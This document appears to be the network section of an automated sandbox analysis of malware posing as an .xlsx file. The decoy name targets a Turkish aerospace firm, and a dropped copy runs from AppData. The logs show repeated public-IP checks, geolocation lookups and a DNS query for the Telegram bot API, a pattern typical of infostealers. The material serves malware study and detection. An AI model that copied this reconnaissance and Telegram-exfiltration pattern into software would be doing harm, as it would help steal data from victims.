Jan 14, 2025 14:14:00.642038107 CET	1.1.1.1	192.168.2.6	0x73d6	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:00.642038107 CET	1.1.1.1	192.168.2.6	0x73d6	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:00.642038107 CET	1.1.1.1	192.168.2.6	0x73d6	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.712008953 CET	1.1.1.1	192.168.2.6	0xa27f	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.712008953 CET	1.1.1.1	192.168.2.6	0xa27f	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.712008953 CET	1.1.1.1	192.168.2.6	0xa27f	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.712008953 CET	1.1.1.1	192.168.2.6	0xa27f	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.712008953 CET	1.1.1.1	192.168.2.6	0xa27f	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.712008953 CET	1.1.1.1	192.168.2.6	0xa27f	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:01.712008953 CET	1.1.1.1	192.168.2.6	0xa27f	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 14, 2025 14:14:12.545697927 CET	1.1.1.1	192.168.2.6	0x8e45	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:00.655152082 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:01.349414110 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:14:01.357018948 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:14:01.586158991 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:14:02.604835987 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:14:02.818888903 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49717	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:03.449208021 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:14:04.117865086 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49721	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:04.755335093 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:05.430644035 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49727	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:05.081933975 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:05.761917114 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:14:05.766155005 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:14:05.976831913 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:05 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 14:14:06.700335979 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:14:06.910023928 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49735	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:06.052334070 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:06.724338055 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:06 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49748	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:07.346443892 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:08.031092882 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:07 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49749	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:07.638478994 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 14, 2025 14:14:08.330791950 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:08 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49758	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:08.641804934 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:09.322504044 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49764	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:09.016622066 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:09.694566965 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49772	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:09.922658920 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:10.602806091 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49777	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:10.311239958 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:11.004448891 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:10 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49786	132.226.247.73	80	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:11.252338886 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:11.924195051 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:11 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49787	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:11.624185085 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:12.312027931 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49801	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:12.917725086 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:13.618935108 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:13 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49816	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:14.256932020 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:14.930644989 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:14 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49827	132.226.247.73	80	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 14:14:15.555381060 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 14, 2025 14:14:16.236222029 CET	273	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:16 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49714	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:02 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:02 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:02 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175231 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C7hlfwFXvM1X9RER%2Bz7CaN%2FtTtgQ17t7Fy0PNDXWXRwmKjqN8Z4LNNtiytvBJlXb%2FmYy6JyngkYA419ovE0iJP6uCPqRgitO7NpsI0%2Fmx6buR6wQE7iWfXRrFqkR1jUCjJl1w1WY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de305a8d98c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1798&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1610590&cwnd=238&unsent_bytes=0&cid=4772d2b0e60e958f&ts=356&x=0"
